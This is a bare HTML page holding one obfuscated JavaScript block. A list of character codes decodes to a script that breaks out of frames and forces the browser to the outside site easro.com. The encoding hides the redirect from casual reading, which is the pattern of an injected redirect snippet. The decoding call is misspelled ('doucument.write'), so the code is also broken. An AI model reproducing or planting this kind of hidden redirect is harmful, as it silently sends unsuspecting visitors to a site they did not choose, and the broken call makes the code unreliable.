<html>
	<head>
	</head>
	<body>
		<SCRIPT LANGUAGE="JavaScript">
		{var temp="",i,c=0,out="";
		str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106
		!97!118!97!115!99!114!105!112!116!34!62!13!10!105!102!32!40!116!111!112!46!108
		!111!99!97!116!105!111!110!32!33!61!32!108!111!99!97!116!105!111!110!41!32!123
		!13!10!32!32!32!116!111!112!46!108!111!99!97!116!105!111!110!46!104!114!101!10
		2!32!61!32!100!111!99!117!109!101!110!116!46!108!111!99!97!116!105!111!110!46!
		104!114!101!102!32!59!13!10!125!13!10!119!105!110!100!111!119!46!108!111!99!97
		!116!105!111!110!32!61!32!34!104!116!116!112!58!47!47!101!97!115!114!111!46!99
		!111!109!34!13!10!60!47!115!99!114!105!112!116!62!";
		
		while(c<=str.length-1)
		{
			while(str.charAt(c)!='!')temp=temp+str.charAt(c++);
			c++;
			out = out +String.fromCharCode(temp);
			temp = "";
		}
		doucument.write(out);
		}
	</SCRIPT>
	</body>
</html>